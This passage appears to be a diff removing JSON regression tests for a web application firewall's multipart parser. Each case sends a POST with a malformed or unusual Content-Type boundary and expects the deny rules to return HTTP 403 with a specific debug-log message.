- "version_min":300000,
- "title":"multipart parser (multiple C-T boundaries - first quoted)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=\"0000\"; boundary=1111",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "Multiple boundary parameters in C-T"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (multiple C-T boundaries - comma separated)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=0000, boundary=1111",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "Multiple boundary parameters in C-T"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (boundary whitespace in C-T - after name)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary =0000",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (boundary whitespace in C-T - before value)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary= 0000",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "boundary whitespace in C-T header"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (boundary whitespace in C-T - after value) - apache removes the whitespace, not the case for us... TODO",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=0000 ",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (boundary special char - trailing whitespace+token)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data;boundary=0000 1111",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r\n",
- "Content-Disposition: form-data; name=\"name\"\r\n",
- "\r\n",
- "Brian Rectanus\r\n",
- "--0000\r\n",
- "Content-Disposition: form-data; name=\"email\"\r\n",
- "\r\n",
- "brian.rectanus@breach.com\r\n",
- "--0000\r\n",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r\n",
- "Content-Type: image/jpeg\r\n",
- "\r\n",
- "BINARYDATA\r\n",
- "--0000--\r\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "No boundaries found in payload"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (boundary special char - trailing exclamation+token)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data;boundary=0000!1111",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "Invalid boundary in C-T \\(characters\\)"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (quoted boundary - normal)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data;boundary=\"0000\"",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "boundary was quoted"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (quoted boundary value - whitespace before)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data;boundary=\" 0000\"",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "boundary was quoted.*No boundaries found in payload"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (quoted boundary value - whitespace after)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data;boundary=\"0000 \"",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted."
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (quoted boundary value - whitespace after)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data;boundary=\"0000 \"",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted."
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (quoted boundary value - whitespace between)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data;boundary=\"0000 1111\"",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "boundary was quoted"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (quoted boundary value - contained quote)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data;boundary=\"00\"00\"",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--00\"00\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--00\"00\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--00\"00\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--00\"00--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "Invalid boundary in C-T \\(characters\\)"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (quoted boundary value - two quoted values)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data;boundary=\"00\"\"00\"",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--00\"00\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--00\"00\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--00\"00\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--00\"00--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "Invalid boundary in C-T \\(characters\\)"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (partial quoted boundary value - only start quote)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data;boundary=\"0000",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "Invalid boundary in C-T \\(quote\\)"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (partial quoted boundary value - only end quote)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data;boundary=0000\"",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "Invalid boundary in C-T \\(quote\\)"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (multipart mixed - normal)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=0000",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r\n",
- "Content-Disposition: form-data; name=\"name\"\r\n",
- "\r\n",
- "Brian Rectanus\r\n",
- "--0000\r\n",
- "Content-Disposition: form-data; name=\"email\"\r\n",
- "\r\n",
- "brian.rectanus@breach.com\r\n",
- "--0000\r\n",
- "Content-Disposition: attachment\r\n",
- "Content-Type: multipart/mixed; boundary=BbC04y\r\n",
- "\r\n",
- "--BbC04y\r\n",
- "Content-Disposition: file; filename=\"file1.txt\"\r\n",
- "Content-Type: text/plain\r\n",
- "\r\n",
- "... contents of file1.txt ...\r\n",
- "--BbC04y\r\n",
- "Content-Disposition: file; filename=\"file2.gif\r\n",
- "Content-Type: image/jpeg\r\n",
- "Content-Transfer-Encoding: binary\r\n",
- "\r\n",
- "...contents of file2.gif...\r\n",
- "--0000--\r\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "Invalid Content-Disposition header"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (multipart mixed - missing disposition)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=0000",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "--0000\r\n",
- "Content-Disposition: form-data; name=\"name\"\r\n",
- "\r\n",
- "Brian Rectanus\r\n",
- "--0000\r\n",
- "Content-Disposition: form-data; name=\"email\"\r\n",
- "\r\n",
- "brian.rectanus@breach.com\r\n",
- "--0000\r\n",
- "Content-Type: multipart/mixed; boundary=BbC04y\r\n",
- "\r\n",
- "--BbC04y\r\n",
- "Content-Disposition: file; filename=\"file1.txt\"\r\n",
- "Content-Type: text/plain\r\n",
- "\r\n",
- "... contents of file1.txt ...\r\n",
- "--BbC04y\r\n",
- "Content-Disposition: file; filename=\"file2.gif\r\n",
- "Content-Type: image/jpeg\r\n",
- "Content-Transfer-Encoding: binary\r\n",
- "\r\n",
- "...contents of file2.gif...\r\n",
- "--0000--\r\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "http_code": 403,
- "debug_log": "Part missing Content-Disposition header"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
- "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"multipart parser (normal)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
